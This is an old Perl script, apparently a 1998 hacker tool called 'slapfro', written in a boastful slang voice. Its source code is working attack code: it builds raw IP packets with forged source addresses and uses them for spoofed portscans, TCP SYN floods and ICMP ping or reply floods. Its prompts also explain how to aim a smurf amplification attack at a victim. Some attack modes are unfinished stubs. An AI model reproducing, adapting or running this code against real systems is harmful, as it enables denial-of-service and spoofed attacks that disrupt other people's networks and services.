#!/usr/bin/perl # # slapfro alpha .005 # (ip swissarmyknife) # # THIS IS AN ALPHA RELEASE, FUCKERS # # initially functional 3/17/98 # updates 4/15/98 # written by miff # # # shouts: 404, dildog, #9mm, cplusplus # # best music on the planet: Faith No More # # experimental spam-plug: 9mm.com, cheap shells. # $30/yr. # some restrictions apply. # # comments / requests for additional # fxnality to miff@9mm.com # use Socket; use strict qw(refs, subs); #axe our homie what he be wantin: my $input; my $prot; my ($a,$b,$c,$d,$e,$f); print "Welcome to slapfro, miff's ip swiss army knife.\n"; print "choose your poison, tcp, udp, or icmp...\n"; $input = <>; chop $input; if ($input =~ "t" || $input =~ "T" ) { $prot = "tcp"; print " choose your kung fu style: 1-portscan, 2-synflood, 3-OOB \n"; $input = <>; chop $input; my $temp = $input; print " enter DESTINATION host (name or ip) \n "; $input = <>; chop $input; $a = $input; print " enter (LOW) DESTINATION port \n "; $input = <>; chop $input; $b = $input; unless ($temp == 2 || $temp =~ "syn") { print " enter HIGH DESTINATION port (same as low for one port only) \n "; $input = <>; chop $input; $c = $input; print " enter SOURCE host (name or ip) \n "; $input = <>; chop $input; $d = $input; print " enter SOURCE port (starting)\n "; $input = <>; chop $input; $e = $input; } # dont need any of that for synflood (it will be random) my $attack; if ($temp == 1 || $temp =~ "port") { $attack = "PORTSCAN"; } elsif ($temp == 2 || $temp =~ "syn") { $attack = "SYNFLOOD"; } elsif ($temp == 3 || $temp =~ "OOB") { $attack = "OOB"; } else { die "bad choice ";} tcpsp00f($a,$b,$c,$d,$e,$attack); print "all done wif $attack, homes. \n \n"; } if ($input =~ "i" || $input =~ "I" ) { $prot = "icmp"; print " pick yo streetfighting style: 1-ping flood, 2-reply flood, 3-exotic \n"; $input = <>; chop $input; my $temp=$input; print " enter DESTINATION host (name or ip) \n "; print " [note - for smurf attack, use a broadcast addy here.] \n "; $input = <>; chop $input; my $aa = $input; print " enter SOURCE host (name or ip) \n "; print " [note - for smurf attack, use the target addy here.] \n "; $input = <>; chop $input; my $bb = $input; print " How many packets would you like to send? (don't be stingy) \n "; $input = <>; chop $input; my $cc = $input; print " What size packets would you like to send? (1000 or less please) \n "; $input = <>; chop $input; my $dd = $input; print " Please enter a wait time between packets? (in seconds - use 0 for flood) \n "; $input = <>; chop $input; my $ee = $input; my $attack; if ($temp == 1 || $temp =~ "ping") { $attack = "PINGFLOOD"; } elsif ($temp == 2 || $temp =~ "repl") { $attack = "REPLYFLOOD"; } elsif ($temp == 3 || $temp =~ "exot") { $attack = "EXOTIC"; die "exotic icmp attacks not yet implemented. \n "; } else { die "bad choice ";} icmpsp00f($aa,$bb,$cc,$dd,$ee,$attack); print "all done wif $attack, homes. \n \n"; } if ($input =~ "u" || $input =~ "U" ) { $prot = "udp"; print " wah wah wah, wah wah wah wah. 1-flood, 2-mystery packet \n"; $input = <>; chop $input; die "udp not up in this mutha just yet \n\n "; } sub tcpsp00f { my ($dest_host,$dest_port_low,$dest_port_hi,$src_host,$src_port,$attack) = @_; #set constants: my ($PROTO_RAW) = 255; # from /etc/protocols my ($PROTO_IP) = 0; #ditto my ($IP_HDRINCL) = 1; #we set the ip header, thanks #look up mah shit... $dest_host = (gethostbyname($dest_host))[4]; unless ($attack eq "SYNFLOOD") { $src_host = (gethostbyname($src_host))[4]; } #time to open a raw socket.... socket(S, AF_INET, SOCK_RAW, $PROTO_RAW) || die $!; #raw socket should be open... #now set the bad boy up... setsockopt(S, $PROTO_IP, $IP_HDRINCL, 1); #bust some data... my ($data) = '31337'; my $counter = 1; my ($port) = $dest_port_low; if ($attack eq "PORTSCAN") { print "\n INITIATING FAKE PORTSCAN \n\n"; while ($port <= $dest_port_hi) { $src_port++; #build a tcp header: my ($packet) = givehead($src_host, $src_port, $dest_host, $port, $data); #bust out the destination... my ($dest) = pack('S n a4 x8', AF_INET, $port, $dest_host); #send a fux0ring packet #send (S,$header.$data,0, $dest); send (S,$packet,0, $dest); $port++; $counter++; if ($counter > 25 ) { print "."; $counter = 1; } } print "\n\n portscan sent, beeyatch \n "; } if ($attack eq "SYNFLOOD") { print "\n INITIATING SYNFLOOD \n\n"; my $syntime = 60; while ($counter < $syntime) { #first, we need random source ip and port: srand(time ^ $$); my $rand1 = int(rand(230)) + 20; my $rand2 = int(rand(255)); my $rand3 = int(rand(255)); my $rand4 = int(rand(255)); my $rport = int(rand(60000)); $src_host = $rand1 . "." . $rand2 . "." . $rand3 . "." . $rand4; #for debugging: #print $src_host . "\n"; #sleep 1; $src_host = (gethostbyname($src_host))[4]; #build a tcp header: my ($packet) = givehead($src_host, $rport, $dest_host, $port, $data); #bust out the destination... my ($dest) = pack('S n a4 x8', AF_INET, $port, $dest_host); #send a fux0ring packet #send (S,$header.$data,0, $dest); send (S,$packet,0, $dest); if ($counter > 25 ) { print "."; $counter = 1; } $counter++; } } if ($attack eq "OOB") { print "OOB attack not yet implemented \n "; } # end it up: die ("done"); } sub givehead { #this section for tcp headers only my ($src_host, $src_port, $dest_host, $dest_port, $data) = @_; my $hdr_cksum = 0; my $zero = 0; my $proto_tcp = 6; # my $data = "31337"; #my ($tcplength) = length($data) + 20; #data + 20 byte tcp hdr my ($tcplength) = 20; # 20 byte tcp hdr my ($totlength) = $tcplength + 20; #tcp + 20 byte ip hdr my ($pseudo_tcp) = pack ('a4 a4 C C n n n C4 C4 C2 n n n', $src_host,$dest_host,$zero,$proto_tcp,$tcplength,$src_port,$dest_port, 0x10,0x00,0x00,0x00, 0x00,0x00,0x00,0x00, #$syn,$ack, 0x50,0x02,0x7c,$zero,$zero); #0x60,0x02,0x7c,$zero,$zero); my ($tcp_chksum) = &checkfro($pseudo_tcp); my $identification = 31337; my ($hdr) = pack ('C2 n n C4 n a4 a4 n n C4 C4 C2 n v n', 0x45, 0x00, $totlength, $identification, 0x40, 0x00, 0x40, $proto_tcp, $hdr_cksum, $src_host, $dest_host, $src_port, $dest_port, 0x10,0x00,0x00,0x00, 0x00,0x00,0x00,0x00, #$syn,$ack, 0x50,0x02,0x7c,$tcp_chksum,$zero); #0x60,0x02,0x7c,$tcp_chksum,$zero,$data); return $hdr; } sub icmpsp00f { my ($dest_host,$src_host,$num_packets,$size,$wait,$attack) = @_; print "$attack ! "; print "Sending $num_packets packets of $size bytes to $dest_host from $src_host. \n "; print "( with $wait second delay between packets ) "; #set constants: my ($PROTO_RAW) = 255; # from /etc/protocols my ($PROTO_IP) = 0; #ditto my ($IP_HDRINCL) = 1; #we set the ip header, thanks my $icmptype; my $port = 0; # i know, this is stupid, but need it to pack dest. if ($attack eq "PINGFLOOD") { $icmptype = 8; } elsif ($attack eq "REPLYFLOOD") { $icmptype = 0; } #look up mah shit... $dest_host = (gethostbyname($dest_host))[4]; $src_host = (gethostbyname($src_host))[4]; #time to open a raw socket.... socket(S, AF_INET, SOCK_RAW, $PROTO_RAW) || die $!; #raw socket should be open... #now set the bad boy up... setsockopt(S, $PROTO_IP, $IP_HDRINCL, 1); my $counter = 1; my $kounter = 0; print "\n INITIATING SPOOFED $attack \n\n"; while ($kounter < $num_packets) { #build an icmp header: my ($packet) = constructificate($src_host, $dest_host, $size, $icmptype); #bust out the destination... my ($dest) = pack('S n a4 x8', AF_INET, $port, $dest_host); #send a fux0ring packet #my $tmpo = length($packet); #print "packet length = $tmpo \n "; send (S,$packet,0, $dest); if ($counter > 25 ) { print "."; $counter = 1; } $counter++; $kounter++; sleep $wait; } } sub constructificate { #this section for icmp headers only my ($src_host, $dest_host, $size, $icmptype) = @_; my $hdr_cksum = 0; my $zero = 0; my $proto_icmp = 1; my $subcode = 0; my $identification = 47882; my $identifier = 29886; $size = $size - 8; # allow for icmp header my $data = "X" x $size; my ($icmplength) = length($data) + 8; #data + 8 byte icmp "hdr" my $hdrlength = 20; my ($totlength) = $icmplength + $hdrlength; #icmp + 20 byte ip hdr my ($pseudo_head) = pack ('C2 n n C4 n a4 a4', 0x45, 0x00, $totlength, $identification, 0x00, 0x00, 0x40, $proto_icmp, $zero, $src_host, $dest_host); my ($hdr_chksum) = &checkfro($pseudo_head); #print "hdr chk = $hdr_chksum\n"; # I HAVE VERIFIED THAT THE ABOVE WORKS AND ENDS UP CORRECT IN PACKET. # SO WTF IS WRONG WIFF ICMP CHECKSUM, FOO? #my ($pseudo_icmp) = pack ('C2 n n C4 n a4 a4 C2 S3 A*', # 0x45, 0x00, $totlength, $identification, 0x00, 0x00, 0x40, $proto_icmp, # $zero, $src_host, $dest_host, # $icmptype,$subcode, # $zero,$identifier,$identifier,$data); #print "packing: $icmplength bytes : type: $icmptype subcode: $subcode zero: $zero id: $identifier \n"; #print " data: $data \n\n"; my ($pseudo_icmp) = pack ('C2 n3 A*', $icmptype,$subcode, $zero,$identifier,$zero,$data); my ($icmp_chksum) = &checkfro($pseudo_icmp); #print "icmp chk = $icmp_chksum\n"; #print "total length = $totlength\n"; my ($packet) = pack ('C2 n n C4 n a4 a4 C2 v n2 A*', 0x45, 0x00, $totlength, $identification, 0x00, 0x00, 0x40, $proto_icmp, $hdr_chksum, $src_host, $dest_host, $icmptype,$subcode, $icmp_chksum,$identifier,$zero,$data); #we use identifier liberally to set ping id (ps id?) and seq... return $packet; } sub checkfro { #dis sekzhun robbed from someplace else.... my ( $msg # The message to checkfro ) = @_; my ($len_msg, # Length of the message $num_short, # The number of short words in the message $short, # One short word $chk # The checkfro ); $len_msg = length($msg); $num_short = $len_msg / 2; $chk = 0; foreach $short (unpack("S$num_short", $msg)) { $chk += $short; } # Add some lead $chk += unpack("C", substr($msg, $len_msg - 1, 1)) if $len_msg % 2; $chk = ($chk >> 16) + ($chk & 0xffff); # bust out mah fro pic return(~(($chk >> 16) + $chk) & 0xffff); # spray some jheri }